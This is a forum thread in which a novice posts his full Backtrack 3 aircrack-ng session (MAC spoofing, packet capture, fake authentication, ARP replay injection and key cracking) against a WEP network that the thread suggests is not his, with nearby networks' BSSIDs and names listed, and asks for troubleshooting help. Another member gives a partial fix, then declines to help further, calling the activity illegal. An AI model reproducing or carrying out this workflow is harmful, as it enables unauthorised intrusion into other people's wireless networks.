Thread: Injection problems in BT3 with Alfa-AWUS036H

  1. #1
    Just burned his ISO
    Join Date
    Jun 2008
    Posts
    4

    Injection problems in BT3 with Alfa-AWUS036H

    Hello, I just bought an Alfa-AWUS036H and it's a really big improvement; now I can see 12 networks in my area, before ... only 4.
    I'm new to Linux and I followed a method to find a WEP password, but I couldn't start injection to receive something.
    I received ... nothing.
    Below you can see exactly what I've done; I noted every step to make it easier for me:



    STEP 1:

    bt ~ # airmon-ng

    STEP 2:

    Interface Chipset Driver

    wlan0 RTL8187 r8187

    bt ~ # airmon-ng stop wlan0

    STEP 3:

    Interface Chipset Driver

    wlan0 RTL8187 r8187 (monitor mode disabled)

    bt ~ # macchanger --mac 00:11:22:33:44:55 wlan0
    Current MAC: 00:c0:ca:1b:5f:3e (Alfa, Inc.)
    Faked MAC: 00:11:22:33:44:55 (Cimsys Inc)
    bt ~ #

    STEP 4:

    bt ~ # airmon-ng start wlan0


    Interface Chipset Driver

    wlan0 RTL8187 r8187 (monitor mode enabled)

    STEP 5:

    bt ~ #airodump-ng wlan0

    CH 2 ][ Elapsed: 52 s ][ 2008-06-27 10:28

    BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID

    00:1E:C7:1F:46:E1 58 111 0 0 6 54. WEP WEP 2WIRE328
    00:04:E2:4E:89:1E 58 58 22 2 1 11 OPN default
    00:1D:7E:1F:3D:8B 44 55 0 0 11 48 OPN linksys
    00:181:A2:20:08 41 28 0 0 11 54. WEP WEP Grillo's
    00:13:46:4A:CC:20 39 36 0 0 6 54. OPN Black Diamond Hotel
    00:0C:41:27:94:48 30 29 0 0 6 11 WEP WEP terracotta
    00:1B:5B:27:B8:71 28 7 0 0 6 54. WEP WEP Jacobs

    BSSID STATION PWR Rate Lost Packets Probes

    00:04:E2:4E:89:1E 00:1B:77:60:EF:85 75 0- 1 0 14 default
    00:1D:7E:1F:3D:8B 00:20:00:03:AF:2D 50 0- 1 46 262 linksys

    bt ~ #

    STEP6:

    bt ~ # airodump-ng -c 6 -w wep123 --bssid 00:1E:C7:1F:46:E1 wlan0


    CH 6 ][ Elapsed: 40 s ][ 2008-06-27 10:32

    BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID

    00:1E:C7:1F:46:E1 100 96 351 0 0 6 54. WEP WEP 2WIRE328

    BSSID STATION PWR Rate Lost Packets Probes

    STEP 7:

    bt ~ #
    bt ~ # aireplay-ng -1 0 -a 00:1E:C7:1F:46:E1 -h 00:11:22:33:44:55 -e 2wire328 wlan0
    10:35:22 Waiting for beacon frame (BSSID: 00:1E:C7:1F:46:E1) on channel 6

    10:35:22 Sending Authentication Request (Open System) [ACK]
    10:35:22 Authentication successful
    10:35:22 Sending Association Request [ACK]

    STEP 8:

    bt ~ # aireplay-ng -3 -b 00:1E:C7:1F:46:E1 -h 00:11:22:33:44:55 wlan0
    10:37:31 Waiting for beacon frame (BSSID: 00:1E:C7:1F:46:E1) on channel 6
    Saving ARP requests in replay_arp-0627-103731.cap
    You should also start airodump-ng to capture replies.
    Read 15230 packets (got 0 ARP requests and 24 ACKs), sent 0 packets...(0 pps)
    bt ~ #

    STEP 9:
    NOW I CHECK INJECTION:

    bt ~ # aireplay-ng -9 -b 00:1E:C7:1F:46:E1 -h 00:11:22:33:44:55 wlan0
    10:42:19 Trying broadcast probe requests...
    10:42:19 Injection is working!
    10:42:21 Found 5 APs

    10:42:21 Trying directed probe requests...
    10:42:21 00:1E:C7:1F:46:E1 - channel: 6 - '2WIRE328'
    10:42:26 Ping (min/avg/max): 0.092ms/142.687ms/196.018ms Power: 100.00
    10:42:26 25/30: 83%

    10:42:26 00:13:46:4A:CC:20 - channel: 6 - 'Black Diamond Hotel'
    10:42:28 Ping (min/avg/max): 15.992ms/61.595ms/148.001ms Power: 35.87
    10:42:28 30/30: 100%

    10:42:28 00:1B:5B:27:B8:71 - channel: 6 - 'Jacobs'
    10:42:34 Ping (min/avg/max): 11.996ms/35.988ms/51.994ms Power: 23.83
    10:42:34 6/30: 20%

    10:42:34 00:0C:41:27:94:48 - channel: 6 - 'terracotta'
    10:42:35 Ping (min/avg/max): 0.012ms/40.395ms/55.997ms Power: 29.00
    10:42:35 30/30: 100%

    10:42:35 00:1E:C7:E1:FA:71 - channel: 6 - 'SHAY'S Tack&Feed'
    10:42:38 Ping (min/avg/max): 23.992ms/66.398ms/107.993ms Power: 26.80
    10:42:38 30/30: 100%

    bt ~ #

    STEP 10:

    bt ~ # aircrack-ng -n -64 -b 00:1E:C7:1F:46:E1 wep123-01.cap
    Invalid WEP key length. [64,128,152,256,512]
    "aircrack-ng --help" for help.
    bt ~ #
    bt ~ # aircrack-ng -n -128 -b 00:1E:C7:1F:46:E1 wep123-01.cap
    Invalid WEP key length. [64,128,152,256,512]
    "aircrack-ng --help" for help.
    bt ~ #


    So, no injection (in step 8) to receive something, but when I tested injection (step 9) against every network it looked like it worked ...
    It's very weird for me ... obviously, because it's a new world for me ...
    Please give me some advice and tell me what I typed wrong. I think I need some special commands for this wireless card.

    Thank you

  2. #2
    Member Apollopimp's Avatar
    Join Date
    Nov 2007
    Posts
    120

    I glanced at what you posted and I see this.. also stay off other people's networks if that's what you're doing..

    Code:
    10:35:22 Sending Authentication Request (Open System) [ACK]
    10:35:22 Authentication successful
    10:35:22 Sending Association Request [ACK]
    after the

    Code:
    Sending Association Request [ACK]
    you should also get

    Code:
    Association successful
    so it should look like this


    Code:
    10:35:22 Sending Authentication Request (Open System) [ACK]
    10:35:22 Authentication successful
    10:35:22 Sending Association Request [ACK]
    10:35:22 Association successful
    follow this http://s32.photobucket.com/player.sw...fs=1&os=1&ap=1

  3. #3
    Just burned his ISO
    Join Date
    Jun 2008
    Posts
    4

    Thank you, you're right ... I have a big problem with association. Finally I've got an error message:
    "association denied (code 12) , wrong ESSID or WPA"

    I don't understand, it appears to be WEP, WEP in the list ...

    Any ideas ?

  4. #4
    Member Apollopimp's Avatar
    Join Date
    Nov 2007
    Posts
    120

    Quote:
    I don't understand, it appears to be WEP, WEP in the list ...

    Well, it's clear that you're trying to crack a network that is not yours, so what you are doing is illegal and you won't get any help from anyone on these forums..

    If you're doing something illegal keep it to yourself; we don't wanna hear about it or help you do it..

  5. #5
    Just burned his ISO
    Join Date
    Jun 2008
    Posts
    4

    Man, relax, I have my own high-speed internet and I don't need another. It's about my friend, my next-door neighbour, and we try to crack each other for fun.
    I also want to find out if he secured it with 64 or 128 bit.
    So, you stopped helping me?

  6. #6
    Member Apollopimp's Avatar
    Join Date
    Nov 2007
    Posts
    120

    I've given you all the help you need; follow the link I gave you..

  7. #7
    Just burned his ISO
    Join Date
    Jun 2008
    Posts
    4

    Thank you, I followed that link and now I've got that (code 12) denied ...

  8. #8
    Member Apollopimp's Avatar
    Join Date
    Nov 2007
    Posts
    120

    Well, you already posted your problem, now search and find the answer.

    Here's your problem:

    Code:
    association denied (code 12) , wrong ESSID or WPA
